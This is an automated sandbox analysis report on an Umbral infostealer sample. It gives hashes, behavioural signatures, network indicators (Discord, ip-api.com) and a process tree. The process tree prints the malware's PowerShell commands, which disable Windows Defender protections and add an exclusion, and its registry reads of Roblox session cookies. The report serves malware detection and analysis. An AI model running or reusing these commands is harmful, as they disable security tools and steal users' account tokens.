Analysis
-
max time kernel
112s -
max time network
121s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
25-08-2024 22:13
Behavioral task
behavioral1
Sample
d3ccce85ce8dfc4087cca43248f44920N.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
d3ccce85ce8dfc4087cca43248f44920N.exe
Resource
win10v2004-20240802-en
General
-
Target
d3ccce85ce8dfc4087cca43248f44920N.exe
-
Size
394KB
-
MD5
d3ccce85ce8dfc4087cca43248f44920
-
SHA1
547a8a789d9167946b5e80a1123ff0aedd04be37
-
SHA256
d87db916c3d491a3616f4db964b0af304b44e82240508aae6cf0616939cc937f
-
SHA512
5b025da2ad754d4e95a9d3ca58af01fc666c7350056e92d781cfbf5c76d19eaebecef3bcc4c2fd2c05ae55f9c71581d39f6b57869c22897bf516c99f4a908e8d
-
SSDEEP
6144:YloZMArIkd8g+EtXHkv/iD4BAHCtxdc8e1mQCiNUhcX7elbKTuq9bfF/H9d9n:GoZHL+EP8y2xw5XN3X3uO
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral2/memory/2472-1-0x000001B205B30000-0x000001B205B98000-memory.dmp family_umbral -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4660 powershell.exe 2364 powershell.exe 3340 powershell.exe 4724 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts d3ccce85ce8dfc4087cca43248f44920N.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 35 discord.com 37 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 22 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3844 wmic.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 4660 powershell.exe 4660 powershell.exe 2364 powershell.exe 2364 powershell.exe 3340 powershell.exe 3340 powershell.exe 2412 powershell.exe 2412 powershell.exe 4724 powershell.exe 4724 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2472 d3ccce85ce8dfc4087cca43248f44920N.exe Token: SeDebugPrivilege 4660 powershell.exe Token: SeDebugPrivilege 2364 powershell.exe Token: SeDebugPrivilege 3340 powershell.exe Token: SeDebugPrivilege 2412 powershell.exe Token: SeIncreaseQuotaPrivilege 1864 wmic.exe Token: SeSecurityPrivilege 1864 wmic.exe Token: SeTakeOwnershipPrivilege 1864 wmic.exe Token: SeLoadDriverPrivilege 1864 wmic.exe Token: SeSystemProfilePrivilege 1864 wmic.exe Token: SeSystemtimePrivilege 1864 wmic.exe Token: SeProfSingleProcessPrivilege 1864 wmic.exe Token: SeIncBasePriorityPrivilege 1864 wmic.exe Token: SeCreatePagefilePrivilege 1864 wmic.exe Token: SeBackupPrivilege 1864 wmic.exe Token: SeRestorePrivilege 1864 wmic.exe Token: SeShutdownPrivilege 1864 wmic.exe Token: SeDebugPrivilege 1864 wmic.exe Token: SeSystemEnvironmentPrivilege 1864 wmic.exe Token: SeRemoteShutdownPrivilege 1864 wmic.exe Token: SeUndockPrivilege 1864 wmic.exe Token: SeManageVolumePrivilege 1864 wmic.exe Token: 33 1864 wmic.exe Token: 34 1864 wmic.exe Token: 35 1864 wmic.exe Token: 36 1864 wmic.exe Token: SeIncreaseQuotaPrivilege 1864 wmic.exe Token: SeSecurityPrivilege 1864 wmic.exe Token: SeTakeOwnershipPrivilege 1864 wmic.exe Token: SeLoadDriverPrivilege 1864 wmic.exe Token: SeSystemProfilePrivilege 1864 wmic.exe Token: SeSystemtimePrivilege 1864 wmic.exe Token: SeProfSingleProcessPrivilege 1864 wmic.exe Token: SeIncBasePriorityPrivilege 1864 wmic.exe Token: SeCreatePagefilePrivilege 1864 wmic.exe Token: SeBackupPrivilege 1864 wmic.exe Token: SeRestorePrivilege 1864 wmic.exe Token: SeShutdownPrivilege 1864 wmic.exe Token: SeDebugPrivilege 1864 wmic.exe Token: SeSystemEnvironmentPrivilege 1864 wmic.exe Token: SeRemoteShutdownPrivilege 1864 wmic.exe Token: SeUndockPrivilege 1864 wmic.exe Token: SeManageVolumePrivilege 1864 wmic.exe Token: 33 1864 wmic.exe Token: 34 1864 wmic.exe Token: 35 1864 wmic.exe Token: 36 1864 wmic.exe Token: SeIncreaseQuotaPrivilege 220 wmic.exe Token: SeSecurityPrivilege 220 wmic.exe Token: SeTakeOwnershipPrivilege 220 wmic.exe Token: SeLoadDriverPrivilege 220 wmic.exe Token: SeSystemProfilePrivilege 220 wmic.exe Token: SeSystemtimePrivilege 220 wmic.exe Token: SeProfSingleProcessPrivilege 220 wmic.exe Token: SeIncBasePriorityPrivilege 220 wmic.exe Token: SeCreatePagefilePrivilege 220 wmic.exe Token: SeBackupPrivilege 220 wmic.exe Token: SeRestorePrivilege 220 wmic.exe Token: SeShutdownPrivilege 220 wmic.exe Token: SeDebugPrivilege 220 wmic.exe Token: SeSystemEnvironmentPrivilege 220 wmic.exe Token: SeRemoteShutdownPrivilege 220 wmic.exe Token: SeUndockPrivilege 220 wmic.exe Token: SeManageVolumePrivilege 220 wmic.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 2472 wrote to memory of 4660 2472 d3ccce85ce8dfc4087cca43248f44920N.exe 87 PID 2472 wrote to memory of 4660 2472 d3ccce85ce8dfc4087cca43248f44920N.exe 87 PID 2472 wrote to memory of 2364 2472 d3ccce85ce8dfc4087cca43248f44920N.exe 90 PID 2472 wrote to memory of 2364 2472 d3ccce85ce8dfc4087cca43248f44920N.exe 90 PID 2472 wrote to memory of 3340 2472 d3ccce85ce8dfc4087cca43248f44920N.exe 92 PID 2472 wrote to memory of 3340 2472 d3ccce85ce8dfc4087cca43248f44920N.exe 92 PID 2472 wrote to memory of 2412 2472 d3ccce85ce8dfc4087cca43248f44920N.exe 94 PID 2472 wrote to memory of 2412 2472 d3ccce85ce8dfc4087cca43248f44920N.exe 94 PID 2472 wrote to memory of 1864 2472 d3ccce85ce8dfc4087cca43248f44920N.exe 103 PID 2472 wrote to memory of 1864 2472 d3ccce85ce8dfc4087cca43248f44920N.exe 103 PID 2472 wrote to memory of 220 2472 d3ccce85ce8dfc4087cca43248f44920N.exe 105 PID 2472 wrote to memory of 220 2472 d3ccce85ce8dfc4087cca43248f44920N.exe 105 PID 2472 wrote to memory of 1000 2472 d3ccce85ce8dfc4087cca43248f44920N.exe 107 PID 2472 wrote to memory of 1000 2472 d3ccce85ce8dfc4087cca43248f44920N.exe 107 PID 2472 wrote to memory of 4724 2472 d3ccce85ce8dfc4087cca43248f44920N.exe 109 PID 2472 wrote to memory of 4724 2472 d3ccce85ce8dfc4087cca43248f44920N.exe 109 PID 2472 wrote to memory of 3844 2472 d3ccce85ce8dfc4087cca43248f44920N.exe 111 PID 2472 wrote to memory of 3844 2472 d3ccce85ce8dfc4087cca43248f44920N.exe 111
Processes
-
C:\Users\Admin\AppData\Local\Temp\d3ccce85ce8dfc4087cca43248f44920N.exe"C:\Users\Admin\AppData\Local\Temp\d3ccce85ce8dfc4087cca43248f44920N.exe"1⤵
- Drops file in Drivers directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2472 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\d3ccce85ce8dfc4087cca43248f44920N.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4660
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2364
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3340
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2412
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1864
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- Suspicious use of AdjustPrivilegeToken
PID:220
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:1000
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4724
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:3844
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD56d3e9c29fe44e90aae6ed30ccf799ca8
SHA1c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA2562360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA51260c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a
-
Filesize
948B
MD55824a6037c081fda5d46de274b6e2799
SHA1526367a09300cbde430e8fb44e41cbe7a0937aac
SHA2564d610d9cd32a20279c7133a726ff61820d6930e5aa18253ee1422f3a6f54953f
SHA512a109b150f730cda78d5bee106bd232f9dca7500dfb7899c6919de2bd542e345ca271aa11809a24ea0a27dca158067ab3a2d5688ac0a2325185143245f1665582
-
Filesize
1KB
MD5d3235ed022a42ec4338123ab87144afa
SHA15058608bc0deb720a585a2304a8f7cf63a50a315
SHA25610663f5a1cb0afe5578f61ebaae2aafb363544e47b48521f9c23be9e6e431b27
SHA512236761b7c68feca8bd62cba90cff0b25fac5613837aaa5d29ae823ace8b06a2057553cf7e72b11ccc59b6c289e471ca1bbac1a880aef5e2868875371a17c1abf
-
Filesize
1KB
MD5e3340d31633b28bd092915b2450e6115
SHA150ba19635a2c47f62d3833672b300f266db9a16a
SHA256bd03160d8d3d3c53fcf495f7e5066953355386873d6e56d806a3475dff52917d
SHA512fdaa58d957b4869d4588c53d292510d4d2fc20a661faba0dd284d43f0dd7bb395a3ef318893bce60b13edd8357f31ac557a567ca4f4d412b54805e19c061e4ec
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82